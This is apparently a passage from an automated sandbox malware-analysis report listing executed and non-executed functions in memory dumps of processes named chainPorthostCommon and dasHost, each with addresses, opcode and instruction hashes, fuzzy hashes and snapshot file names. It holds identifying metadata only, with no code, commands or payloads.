                                                                                    • Instruction ID: ce211291804ac80c6a14dc8e1c1d06f4e61a86c359b9cd18b7606fcdcaff5981
                                                                                    • Opcode Fuzzy Hash: fcb193c1b6e89f5db3a3d7d76a35bba0847c82d888d99b4f252ddf5c9b5a5123
                                                                                    • Instruction Fuzzy Hash: D7E08621B5C8590BEB7CB6B568B16B17280DB46315B0541BAD41AD26C6DC5E5C814281
                                                                                    Function 00007FFD343E5518 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343e0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction ID: 4640bb846717c77e64037ae798f4c740fb56b9dcadbfe4fc94d7acd97375bf17
                                                                                    • Opcode Fuzzy Hash: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction Fuzzy Hash: B5D05E30B609094B8B0CB62D8458430F3D1E7AA6067945278D44BC3285ED2AECC68B80
                                                                                    Function 00007FFD343D4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: c3574f17ea6472ccfd9d5795fce2fde2abe249d1d78e15150e0c03fe877680af
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: 97E01A70F4911A4BFBA8B248D8E13F96264EF8A304F145078DB6ED33C5DD3DAD409605
                                                                                    Function 00007FFD343E3E00 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343e0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                    • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                                    Function 00007FFD343E4BD7 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343e0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction ID: 07d9137669ff819bbfef3455231f0d6bd9c63b4847d5cabdd0a3aaa4c5b20c5f
                                                                                    • Opcode Fuzzy Hash: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction Fuzzy Hash: B0D05B21B4D91747E645FA045CE077B2161EF19300F140074D64FC31C2CD3CE8427601
                                                                                    Function 00007FFD343D06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: 3048f9248019bea7b6f186f8c5423cf2b2eab0437b84f9e769dd21ee3450d732
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 16C08C00FCB58B00B400316E18E60ECA120DBC7A28FD00032D30CD20959C3F20C5214A
                                                                                    Function 00007FFD343D12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: f2c7580b359e954caa7700577bdda0318b4c9fe2d3013718838c153da6db0bf5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: 3DC04C345558098FC948FB2DC99591477A0FB1A215BD50190E409C7171D66ADCD5D741
                                                                                    Function 00007FFD343D06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: 735aa1df858eb5aeddf2c33aa0c7ee299a1304de0fead9086c4a11b781a4167b
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 26B01200DD748F00A40431BA08D60A47050AB47104FC00070D60CC1089987F10942242

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD343D09B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.3034614781.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_7ffd343d0000_chainPorthostCommon.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 86621e1fde3edf3ffc71cc49db4154185685da0f32ebebede09d868d991338ff
                                                                                    • Instruction ID: ea701b244c41a3dadb844275df2aec8f17d56ebb99556ec92d02f40348e8dd15
                                                                                    • Opcode Fuzzy Hash: 86621e1fde3edf3ffc71cc49db4154185685da0f32ebebede09d868d991338ff
                                                                                    • Instruction Fuzzy Hash: 0151A007B0E56345E32233FD70611EE6BA8DF8233AB584677E24CDB0834D1A65C682E5

                                                                                    Executed Functions

                                                                                    Function 00007FFD343D0D48 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5[_H
                                                                                    • API String ID: 0-3279724263
                                                                                    • Opcode ID: 4c231d2bf409d1083167b98ea5f4977a06f1cdd58692b70c2abfbd42d2ec2071
                                                                                    • Instruction ID: 3ec9e0e90530b7ec7474b846498a33f8e59a995f02f92a3235f395772c384738
                                                                                    • Opcode Fuzzy Hash: 4c231d2bf409d1083167b98ea5f4977a06f1cdd58692b70c2abfbd42d2ec2071
                                                                                    • Instruction Fuzzy Hash: AA91D4B5A19A894FE759EB6C88757E9BFE1FB9A310F0401BBC04AD72D2CA791811C700
                                                                                    Function 00007FFD343D0E43 Relevance: .2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 88f354738b944caafc734ce5c03a2f3c125c89ea8d0ffde1f299de69fd9c5d66
                                                                                    • Instruction ID: f1127750de94ef1a56e1185f064dc86c1a3202a85fb1386c2b8f3987e272d4ea
                                                                                    • Opcode Fuzzy Hash: 88f354738b944caafc734ce5c03a2f3c125c89ea8d0ffde1f299de69fd9c5d66
                                                                                    • Instruction Fuzzy Hash: 7651D0B6B19A4D8BE798DB5C84653E9BFE1FB9A324F54017EC00ED7791CAB91811C300
                                                                                    Function 00007FFD343D08D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 411d86c1bfb946d734567938dcbbefb9b2015b4658ac4557d5aea9a35dd82040
                                                                                    • Instruction ID: a14a72318c7ec76315454ec4e5efe4a62258776237d7ec86b4029b4208569d4a
                                                                                    • Opcode Fuzzy Hash: 411d86c1bfb946d734567938dcbbefb9b2015b4658ac4557d5aea9a35dd82040
                                                                                    • Instruction Fuzzy Hash: D5415A12B4E6650EE715B7BC60B52F977A0EF8A335B1444BBD14DC7193CE2EA8818280
                                                                                    Function 00007FFD343D0960 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 00b3e42036dbdc8d9126ac2013830192ec52013f3a263be00984c0b8d4492d34
                                                                                    • Instruction ID: a56b534c8b551947b2a72a8b10a0e57ecbdcfe691d3aad1a9345f8ef3d68b98a
                                                                                    • Opcode Fuzzy Hash: 00b3e42036dbdc8d9126ac2013830192ec52013f3a263be00984c0b8d4492d34
                                                                                    • Instruction Fuzzy Hash: 7431F511B5DA190BE764B7AC64A66F973D5EF8A325F14447AE40DC3193CD2EA8814280
                                                                                    Function 00007FFD343D0998 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: df39afef0823d02d18d1a163114300de07c630b62e184ae91941129eb9d3260d
                                                                                    • Instruction ID: 3845c1f0c983a831089d96379248e9cd326c1c35aac3c2eaa51b999006eb21b9
                                                                                    • Opcode Fuzzy Hash: df39afef0823d02d18d1a163114300de07c630b62e184ae91941129eb9d3260d
                                                                                    • Instruction Fuzzy Hash: EE210620B5E9590FE758F76C94A96BA76D1EB8E321F0400BDE50EC32A3DD3DAC418340
                                                                                    Function 00007FFD343E3E79 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: I
                                                                                    • API String ID: 0-3707901625
                                                                                    • Opcode ID: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction ID: ac234ff9dbf8d27131357c6d54bdfd49a1db4cf95054320098e49e93c8bd06fc
                                                                                    • Opcode Fuzzy Hash: e48cee1027e4841cd7602fc842a062a82e6595f5f54977bb866b62b32c35afe8
                                                                                    • Instruction Fuzzy Hash: CFE0127194B3C04FCB49EB3584A58957F60EF6721078E50EEC145CF1A3D62DD889C701
                                                                                    Function 00007FFD343D1171 Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ef215402e1e86f29e70935aa36f7b35429288cad16b5c91567dc0ee189e92fd1
                                                                                    • Instruction ID: be35c329a25de28fb6bffa370a1d67d050df2c2ce259af4d6516cd5208a135db
                                                                                    • Opcode Fuzzy Hash: ef215402e1e86f29e70935aa36f7b35429288cad16b5c91567dc0ee189e92fd1
                                                                                    • Instruction Fuzzy Hash: 5E31A431A0D68A8FDF46EB64C8A59A97BF0FF5B310B0805BBC009D71A3DA3DA845C751
                                                                                    Function 00007FFD343E4275 Relevance: .1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2a3d4a8cb6b01cbd010a4e1143d644816fa0991be4ca169069b2ba15371c8f90
                                                                                    • Instruction ID: 16730eecb014001220e6d03103163e549e39bf20a6326f1ee845c9ce7bffd559
                                                                                    • Opcode Fuzzy Hash: 2a3d4a8cb6b01cbd010a4e1143d644816fa0991be4ca169069b2ba15371c8f90
                                                                                    • Instruction Fuzzy Hash: 1821B032F0951B8AEB54EB48D8A56BF77A2FF65300F04063AC219D7281DF7969819780
                                                                                    Function 00007FFD343D0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Function 00007FFD343D0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Function 00007FFD343D0C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction ID: 6541a784fb46a1b52f8c29ef641667630fa5a2dcfa7baf3616abb2f26d24beba
                                                                                    • Opcode Fuzzy Hash: e5b5af8b14389f6b2f348cb39dc5740f57e578ee045d4c683d3caf629a47149b
                                                                                    • Instruction Fuzzy Hash: 1001AD35A0E7888FE702EB2884A42DD7FB0EF43314F1545EAC180DB292D5395A489B80
                                                                                    Function 00007FFD343D5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Function 00007FFD343D5F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Function 00007FFD343D0C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Function 00007FFD343E42CD Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1407730606941bfbf97eaf5ae90038af5f0a997c12730fea3fd74f12118de58c
                                                                                    • Instruction ID: 386b182c20c208d2bee0d42123dfc94c76ab60b6edef46894ea0c5397d75f9dd
                                                                                    • Opcode Fuzzy Hash: 1407730606941bfbf97eaf5ae90038af5f0a997c12730fea3fd74f12118de58c
                                                                                    • Instruction Fuzzy Hash: 93F0A432F4951E8FEB58EB44C8A54BE73A1FB69310F04063AC11AD7390DF7869408740
                                                                                    Function 00007FFD343D0C50 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction ID: 220322e8e1aa441e93854d38f7731614a4ebb86235473affcf0ae8e436dd0677
                                                                                    • Opcode Fuzzy Hash: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction Fuzzy Hash: B9018F34A0E3888FE712EB6484941DDBFF0AF03308F1441EAC580DB192D9395A48C741
                                                                                    Function 00007FFD343D0B87 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction ID: 1024ff713126171387a3fc8aeef8a02c854a77d489bb69c09cd9b6fa1afbf811
                                                                                    • Opcode Fuzzy Hash: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction Fuzzy Hash: 01E07D3232D94E4FDF02FB3CDC974A83B50EB8B21078700FAD108CB0A2C212684E8B01
                                                                                    Function 00007FFD343D173C Relevance: .0, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3578a717b9436a7b1dcc73c890f639642e3fdd1b05cd7d681b05ec1eb709d8e1
                                                                                    • Instruction ID: 3c8bdbd3cc9de207283bf3e4dc6e0eced58735e26f9e0f4cb0717be08df592d4
                                                                                    • Opcode Fuzzy Hash: 3578a717b9436a7b1dcc73c890f639642e3fdd1b05cd7d681b05ec1eb709d8e1
                                                                                    • Instruction Fuzzy Hash: CFF0E521F4D4174BF729F244C8A05FE219A9B42320F594276D81FC32C6DE5DAE0193C5
                                                                                    Function 00007FFD343E5518 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction ID: 4640bb846717c77e64037ae798f4c740fb56b9dcadbfe4fc94d7acd97375bf17
                                                                                    • Opcode Fuzzy Hash: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction Fuzzy Hash: B5D05E30B609094B8B0CB62D8458430F3D1E7AA6067945278D44BC3285ED2AECC68B80
                                                                                    Function 00007FFD343E5590 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343e0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 097a5ec285f47c32320dc2335d4b89014e990064ce466535680a15dc6ac09314
                                                                                    • Instruction ID: 3083c0e994a7ff374a0ccb029de4f782e729976e1ab4b9215e0ed9c9a93e83d8
                                                                                    • Opcode Fuzzy Hash: 097a5ec285f47c32320dc2335d4b89014e990064ce466535680a15dc6ac09314
                                                                                    • Instruction Fuzzy Hash: 7FD05E30BA090D4B8B4CB62D8468430B3D1EBAA2067D45278D40BC3282ED29ECC68B80
                                                                                    Function 00007FFD343D4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3289812560.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffd343d0000_dasHost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
